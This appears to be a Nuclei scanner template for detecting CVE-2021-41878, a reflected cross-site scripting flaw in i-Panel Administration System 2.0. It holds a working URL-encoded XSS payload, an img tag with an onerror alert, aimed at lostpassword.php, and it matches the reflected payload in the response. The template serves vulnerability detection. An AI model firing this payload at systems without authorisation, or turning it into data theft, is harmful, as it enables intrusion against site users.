46 lines
1.2 KiB
YAML
46 lines
1.2 KiB
YAML
id: CVE-2021-41878
|
|
|
|
info:
|
|
name: i-Panel Administration System 2.0 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: |
|
|
i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console.
|
|
reference:
|
|
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
|
|
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-41878
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2021,ipanel,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '><img src=a onerror=alert("document.domain")>'
|
|
- 'i-Panel Administration'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/09/28
|